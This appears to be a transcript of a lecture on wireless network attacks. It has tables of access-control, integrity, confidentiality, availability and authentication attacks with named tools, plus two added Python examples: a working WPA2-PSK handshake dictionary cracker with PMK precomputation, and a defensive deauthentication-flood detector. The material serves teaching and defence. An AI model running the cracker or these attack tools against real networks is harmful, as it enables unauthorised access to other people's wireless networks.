Lecture 11: Hacking Wireless Networks and Network Attacks PDF

Summary

This lecture provides an overview of hacking wireless networks and network attacks. It lists the security threats and common defence techniques, then catalogues the wireless attack classes with their methods and tools: access control, integrity, confidentiality, availability and authentication attacks, followed by rogue access point, client mis-association and other attacks.

Full Transcript


Lecture 11- Hacking Wireless Networks and Network Attacks

SECURITY THREATS
❖ Lack of physical security controls
❖ Use of untrusted networks
❖ Use of untrusted mobile devices
❖ Use of applications created by unknown parties
❖ Interaction with other systems
❖ Use of untrusted content
❖ Use of location services

COMMON DEFENCE TECHNIQUES
❖ Change the router's default user name and password
❖ Change the internal IP subnet if possible
❖ Change the default SSID (Service Set Identifier) and disable SSID broadcasting. A hidden SSID is still carried in probe requests and responses, so this stops casual discovery, not the war-driving tools listed below
❖ Use a long passphrase: none of the attack methods below become faster or more effective against a longer passphrase, and a long random passphrase is absent from the wordlists that the PSK cracking tools depend on
❖ Restrict access to the wireless network by filtering on MAC (Media Access Control) addresses. On its own this is a weak control, since MAC spoofing (see the access control attacks below) lets an attacker clone any address observed on the air
❖ Use encryption. WEP keys are recoverable with the tools in the confidentiality table, so use WPA2 rather than WEP

WIRELESS THREATS

❖ Access Control Attacks
▪ Aim to penetrate a network by evading WLAN access control measures such as AP MAC filters and Wi-Fi port access control

ACCESS CONTROL ATTACKS (Type of Attack / Description / Methods and Tools)

War Driving
    Description: Discovering wireless LANs by listening to beacons or sending probe requests, thereby providing a launch point for further attacks.
    Methods and tools: Airmon-ng, DStumbler, KisMAC, MacStumbler, NetStumbler, Wellenreiter, WiFiFoFum

Rogue Access Points
    Description: Installing an unsecured AP inside the firewall, creating an open backdoor into the trusted network.
    Methods and tools: Any hardware or software AP

Ad Hoc Associations
    Description: Connecting directly to an unsecured station to circumvent AP security or to attack the station.
    Methods and tools: Any wireless card or USB adapter

MAC Spoofing
    Description: Reconfiguring an attacker's MAC address to pose as an authorized AP or station.
    Methods and tools: MacChanger, SirMACsAlot, SMAC, Wellenreiter, wicontrol

802.1X RADIUS Cracking
    Description: Recovering the RADIUS secret by brute force from an 802.1X access request, for use by an evil twin AP.
    Methods and tools: Packet capture tool on the LAN or on the network path between the AP and the RADIUS server

❖ Integrity Attacks
▪ The attacker sends forged control, management or data frames over a wireless network to misdirect the wireless device in order to perform another type of attack

INTEGRITY ATTACKS (Type of Attack / Description / Methods and Tools)

802.11 Frame Injection
    Description: Crafting and sending forged 802.11 frames.
    Methods and tools: Airpwn, File2air, libradiate, void11, WEPWedgie, wnet dinject/reinject

802.11 Data Replay
    Description: Capturing 802.11 data frames for later (modified) replay.
    Methods and tools: Capture + injection tools

802.1X EAP Replay
    Description: Capturing 802.1X Extensible Authentication Protocol messages (e.g., EAP Identity, Success, Failure) between station and AP for later replay.
    Methods and tools: Wireless capture + injection tools

802.1X RADIUS Replay
    Description: Capturing RADIUS Access-Accept or Access-Reject messages for later replay.
    Methods and tools: Ethernet capture + injection tools between the AP and the authentication server

❖ Confidentiality Attacks
▪ Attempts to intercept confidential information sent over wireless associations, whether sent in clear text or encrypted by Wi-Fi protocols

CONFIDENTIALITY ATTACKS (Type of Attack / Description / Methods and Tools)

Eavesdropping
    Description: Capturing and decoding unprotected application traffic to obtain potentially sensitive information.
    Methods and tools: bsd-airtools, Ettercap, Kismet, Wireshark, commercial analyzers

WEP Key Cracking
    Description: Capturing data to recover a WEP key using passive or active methods.
    Methods and tools: Aircrack-ng, airoway, AirSnort, chopchop, dwepcrack, WepAttack, WepDecrypt, WepLab, wesside

Evil Twin AP
    Description: Masquerading as an authorized AP by beaconing the WLAN's service set identifier (SSID) to lure users.
    Methods and tools: cqureAP, D-Link G200, HermesAP, Rogue Squadron, WifiBSD

AP Phishing
    Description: Running a phony portal or Web server on an evil twin AP to "phish" for user logins and credit card numbers.
    Methods and tools: Airpwn, Airsnarf, Hotspotter, Karma, RGlueAP

Man in the Middle
    Description: Running traditional man-in-the-middle attack tools on an evil twin AP to intercept TCP sessions or SSL/SSH tunnels.
    Methods and tools: dsniff, Ettercap-NG, sshmitm
❖ Availability Attacks
▪ Denial of service attacks aim to prevent legitimate users from accessing resources in a wireless network

AVAILABILITY ATTACKS (Type of Attack / Description / Methods and Tools)

AP Theft
    Description: Physically removing an AP from a public space.
    Methods and tools: "Five finger discount"

Queensland DoS
    Description: Exploiting the CSMA/CA Clear Channel Assessment (CCA) mechanism to make a channel appear busy.
    Methods and tools: An adapter that supports CW Tx mode, with a low-level utility to invoke continuous transmit

802.11 Beacon Flood
    Description: Generating thousands of counterfeit 802.11 beacons to make it hard for stations to find a legitimate AP.
    Methods and tools: FakeAP

802.11 Associate / Authenticate Flood
    Description: Sending forged Authenticates or Associates from random MACs to fill a target AP's association table.
    Methods and tools: FATA-Jack, Macfld

802.11 TKIP MIC Exploit
    Description: Generating invalid TKIP data to exceed the target AP's MIC error threshold, suspending WLAN service.
    Methods and tools: File2air, wnet dinject, LORCON

802.11 Deauthenticate Flood
    Description: Flooding station(s) with forged Deauthenticates or Disassociates to disconnect users from an AP.
    Methods and tools: Aireplay, Airforge, MDK, void11, commercial WIPS

802.1X EAP-Start Flood
    Description: Flooding an AP with EAP-Start messages to consume resources or crash the target.
    Methods and tools: QACafe, File2air, libradiate

802.1X EAP-Failure
    Description: Observing a valid 802.1X EAP exchange, and then sending the station a forged EAP-Failure message.
    Methods and tools: QACafe, File2air, libradiate

802.1X EAP-of-Death
    Description: Sending a malformed 802.1X EAP Identity response known to cause some APs to crash.
    Methods and tools: QACafe, File2air, libradiate

(row truncated in the source)
    Description: Sending EAP type-specific messages

❖ Authentication Attacks
▪ Aim to steal the identity of Wi-Fi clients, their personal information, login credentials etc. to gain unauthorised access to network resources

AUTHENTICATION ATTACKS (Type of Attack / Description / Methods and Tools)

Shared Key Guessing
    Description: Attempting 802.11 Shared Key Authentication with guessed, vendor default or cracked WEP keys.
    Methods and tools: WEP cracking tools
PSK Cracking
    Description: Recovering a WPA/WPA2 PSK from captured key handshake frames using a dictionary attack tool.
    Methods and tools: coWPAtty, genpmk, KisMAC, wpa_crack

Application Login Theft
    Description: Capturing user credentials (e.g., e-mail address and password) from cleartext application protocols.
    Methods and tools: Ace Password Sniffer, Dsniff, PHoss, WinSniffer

Domain Login Cracking
    Description: Recovering user credentials (e.g., Windows login and password) by cracking NetBIOS password hashes, using a brute-force or dictionary attack tool.
    Methods and tools: John the Ripper, L0phtCrack, Cain

VPN Login Cracking
    Description: Recovering user credentials (e.g., PPTP password or IPsec Preshared Secret Key) by running brute-force attacks on VPN authentication protocols.
    Methods and tools: ike_scan and ike_crack (IPsec), anger and THC-pptp-bruter (PPTP)

802.1X Identity Theft
    Description: Capturing user identities from cleartext 802.1X Identity Response packets.
    Methods and tools: Capture tools

802.1X Password Guessing
    Description: Using a captured identity, repeatedly attempting 802.1X authentication to guess the user's password.
    Methods and tools: Password dictionary

802.1X LEAP Cracking
    Description: Recovering user credentials from captured 802.1X Lightweight EAP (LEAP) packets using a dictionary attack tool to crack the NT password hash.
    Methods and tools: Anwrap, Asleap, THC-LEAPcracker
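The PSK Cracking row (coWPAtty, genpmk, wpa_crack) and the passphrase-length advice in the defence list describe one computation. The block below is an added example, not material from the lecture: it implements that computation in Python, deriving the PMK and PTK from each candidate passphrase and checking the EAPOL MIC against a captured message 2 of the WPA2 4-way handshake. The SSID, MAC addresses, nonces and the EAPOL-Key frame are all constructed inside the block rather than taken from a real capture. The 4096-round PBKDF2 step is where the cost lives, which is why genpmk precomputes PMK tables per SSID and why a long random passphrase, absent from every wordlist, defeats the attack outright.

```python
"""Dictionary attack on a WPA2-PSK 4-way handshake (added example).

This is the computation behind coWPAtty, genpmk and aircrack-ng:
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-384(PMK, "Pairwise key expansion",
                min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  KCK = PTK[0:16]
  MIC = HMAC-SHA1(KCK, EAPOL-Key frame with the MIC field zeroed)[0:16]   (CCMP, descriptor v2)
A candidate passphrase is correct iff the recomputed MIC equals the captured one.
The SSID, MACs, nonces and EAPOL frame below are constructed, not from a real pcap.
"""
import hashlib
import hmac

SSID = b"corp-wifi"     # assumed network name
MIC_OFFSET = 81         # 4-byte EAPOL header + 77 bytes of Key Descriptor before the MIC
MIC_LEN = 16


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """The expensive step: 4096 PBKDF2 rounds that depend only on SSID and passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)     # PRF-384 for CCMP


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (AES/CCMP): HMAC-SHA1 over the frame with its MIC zeroed, truncated."""
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def mic_for_pmk(pmk: bytes, hs: dict) -> bytes:
    ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return eapol_mic(ptk[:16], hs["eapol"])


def captured_mic(hs: dict) -> bytes:
    return hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]


def check_candidate(passphrase: bytes, hs: dict) -> bool:
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    return hmac.compare_digest(mic_for_pmk(pmk, hs), captured_mic(hs))


def dictionary_attack(wordlist, hs: dict):
    """Straight coWPAtty mode: one PBKDF2 per candidate. Returns the passphrase or None."""
    return next((w for w in wordlist if check_candidate(w, hs)), None)


def precompute_pmk_table(wordlist, ssid: bytes) -> dict:
    """genpmk mode: PBKDF2 is independent of the handshake, so PMKs are precomputed per SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def attack_with_table(table: dict, hs: dict):
    """Only the cheap PRF + HMAC per candidate remain once the PMK table exists."""
    target = captured_mic(hs)
    return next((w for w, pmk in table.items() if hmac.compare_digest(mic_for_pmk(pmk, hs), target)), None)


def constructed_handshake(true_passphrase: bytes) -> dict:
    """Simulate message 2 of the 4-way handshake as a sniffer would capture it.

    Constructed data: fixed MACs and nonces, and a minimal 99-byte EAPOL-Key frame
    (EAPOL header, descriptor type 2, key info 0x010a = pairwise + MIC + version 2,
    key length 16, replay counter 1, SNonce, zero IV/RSC/ID, MIC, empty key data),
    with the MIC filled in from the true passphrase so there is something to verify.
    """
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    body = (b"\x02\x01\x0a" + (16).to_bytes(2, "big") + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN) + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    hs = {"ssid": SSID, "ap_mac": ap_mac, "sta_mac": sta_mac,
          "anonce": anonce, "snonce": snonce, "eapol": eapol}
    mic = mic_for_pmk(pmk_from_passphrase(true_passphrase, SSID), hs)
    hs["eapol"] = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return hs


if __name__ == "__main__":
    hs = constructed_handshake(b"correct horse battery")
    words = [b"password", b"letmein", b"corp-wifi", b"correct horse battery", b"admin123"]
    print("recovered:", dictionary_attack(words, hs))
```

With a real capture the same code applies once the two MACs, both nonces and the full EAPOL-Key frame of message 2 (or 4) are pulled from the pcap; the MIC offset is the same for every WPA2 handshake, only the key-data length after it varies. Note that the PMK table from `precompute_pmk_table` is useless against any other SSID, which is the defensive argument for changing the default SSID that the lecture makes.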
ROGUE ACCESS POINT ATTACK
❖ A rogue wireless access point placed into an 802.11 network can be used to hijack the connections of legitimate network users
❖ When a user turns on the computer, the rogue wireless access point offers a connection to the user's NIC
❖ All the traffic the user enters then passes through the rogue access point, enabling a form of wireless packet sniffing

CLIENT MIS-ASSOCIATION
❖ The attacker sets up a rogue access point outside the corporate perimeter and lures employees of the organization to connect to it
❖ Once associated, employees may bypass the enterprise security policies

OTHER ATTACKS
❖ Misconfigured Access Point Attack
❖ Unauthorised Association
❖ Honeyspot Access Point Attack
❖ AP MAC Spoofing
❖ Denial of Service Attack
❖ Jamming Signal Attack
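The denial of service item above and the 802.11 Deauthenticate Flood row in the availability table are the same technique, and it is the one a WIPS most commonly alerts on. The block below is an added example, not part of the lecture: a Python detector that parses raw 802.11 management-frame headers as a monitor-mode capture delivers them and flags any BSSID whose deauthentication/disassociation rate exceeds a threshold inside a sliding one-second window. The threshold and window are assumed tuning values, the AP and client addresses are made up, and the capture at the bottom is constructed rather than recorded.

```python
"""Detect an 802.11 deauthentication / disassociation flood (added example).

Parses raw management-frame headers as a monitor-mode capture (airodump-ng,
Kismet, a WIPS sensor) delivers them and flags a BSSID once the number of
deauth/disassoc frames carrying its address inside a one-second window exceeds
a threshold. The frames at the bottom are constructed, not a real capture.
"""
import struct
from collections import defaultdict

BROADCAST = b"\xff" * 6
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
THRESHOLD = 10      # frames per window per BSSID; an assumed tuning value
WINDOW = 1.0        # seconds


def mac_str(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, da, sa, bssid, reason) for a management frame, else None.

    MAC header: frame control (2), duration (2), addr1 = DA (6), addr2 = SA (6),
    addr3 = BSSID (6), sequence control (2) = 24 bytes. Deauth and disassoc
    bodies begin with a little-endian 16-bit reason code.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:          # type 0 = management; ignore control/data
        return None
    subtype = (fc0 >> 4) & 0xF
    da, sa, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, da, sa, bssid, reason


def detect_deauth_flood(capture, threshold=THRESHOLD, window=WINDOW):
    """capture: iterable of (timestamp_seconds, raw_frame_bytes).

    Returns {bssid: {"count", "broadcast", "reasons"}} for each BSSID whose
    peak deauth/disassoc count in any `window` exceeded `threshold`.
    """
    events = defaultdict(list)              # bssid -> [(ts, da, reason), ...]
    for ts, frame in capture:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        subtype, da, sa, bssid, reason = parsed
        if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            events[bssid].append((ts, da, reason))

    alerts = {}
    for bssid, evs in events.items():
        evs.sort(key=lambda e: e[0])
        key, start = mac_str(bssid), 0
        for end in range(len(evs)):          # sliding window over sorted timestamps
            while evs[end][0] - evs[start][0] > window:
                start += 1
            count = end - start + 1
            if count > threshold and count > alerts.get(key, {}).get("count", 0):
                burst = evs[start:end + 1]
                alerts[key] = {
                    "count": count,
                    # floods usually target ff:ff:ff:ff:ff:ff to drop every client at once
                    "broadcast": any(da == BROADCAST for _ts, da, _r in burst),
                    "reasons": sorted({r for _ts, _da, r in burst}),
                }
    return alerts


def mgmt_frame(subtype, da, sa, bssid, reason, seq=0):
    """Build a minimal management frame with a reason-code body (constructed input)."""
    fc = bytes([subtype << 4, 0x00])        # version 0, type 0 (management), flags 0
    return fc + b"\x00\x00" + da + sa + bssid + struct.pack("<H", seq << 4) + struct.pack("<H", reason)


AP = bytes.fromhex("001122334455")        # assumed BSSID
CLIENT = bytes.fromhex("66778899aabb")    # assumed station


def constructed_capture():
    """Benign traffic followed by a 40-frame broadcast deauth burst spoofing the AP."""
    cap = [
        (0.0, mgmt_frame(SUBTYPE_DEAUTH, AP, CLIENT, AP, 3)),   # client leaving (reason 3)
        (0.5, mgmt_frame(0x8, BROADCAST, AP, AP, 0)),           # a beacon (dummy body), ignored
        (0.6, bytes([0x08, 0x00]) + bytes(22)),                 # a data frame, ignored
    ]
    cap += [(10.0 + i * 0.01, mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP, 7, seq=i))
            for i in range(40)]             # reason 7 = class 3 frame from nonassociated STA
    return cap


if __name__ == "__main__":
    for bssid, info in detect_deauth_flood(constructed_capture()).items():
        print(f"ALERT deauth flood from {bssid}: {info}")
```

A single deauthentication with reason 3 is what a station sends when it leaves, so the detector keys on rate, not presence. The broadcast destination and the uniform reason code in a burst are the two fields an analyst checks next, since a legitimate AP deauthenticates one client at a time with a reason that fits the situation.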
